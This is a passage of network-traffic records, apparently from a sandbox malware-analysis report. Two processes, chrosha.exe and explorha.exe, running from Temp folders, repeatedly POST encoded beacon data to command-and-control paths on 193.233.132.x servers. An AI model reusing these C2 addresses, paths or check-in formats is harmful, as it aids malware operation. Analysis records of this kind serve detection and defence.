                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:19.568156958 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
947 | 192.168.2.5 | 50797 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:19.563560009 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:19.815685987 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
948 | 192.168.2.5 | 50798 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:19.926707983 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:20.174391031 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
949 | 192.168.2.5 | 50799 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:20.188282967 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:34:20.430874109 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
950 | 192.168.2.5 | 50800 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:20.426443100 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:20.679898977 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
951 | 192.168.2.5 | 50801 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:20.683221102 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:20.932156086 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
952 | 192.168.2.5 | 50802 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:21.039366961 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:34:21.280375957 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
953 | 192.168.2.5 | 50803 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:21.285053968 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:34:21.527728081 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
954 | 192.168.2.5 | 50804 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:21.529706001 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:21.779273033 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
955 | 192.168.2.5 | 50805 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:21.783415079 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:22.037081003 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
956 | 192.168.2.5 | 50807 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:22.155663967 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:22.407547951 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
957 | 192.168.2.5 | 50808 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:22.399734020 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:22.645073891 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
958 | 192.168.2.5 | 50809 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:22.661086082 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:22.914602995 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
959 | 192.168.2.5 | 50810 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:22.893455982 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:23.141645908 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
960 | 192.168.2.5 | 50811 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:23.273309946 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:23.516922951 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
961 | 192.168.2.5 | 50812 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:23.487164974 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:23.728092909 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
962 | 192.168.2.5 | 50813 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:23.775243044 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:24.027697086 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
963 | 192.168.2.5 | 50814 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:23.991250038 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:24.246453047 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
964 | 192.168.2.5 | 50815 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:24.379095078 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:24.619643927 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
965 | 192.168.2.5 | 50816 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:24.612878084 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:24.861007929 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
966 | 192.168.2.5 | 50817 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:24.875261068 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:25.127940893 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
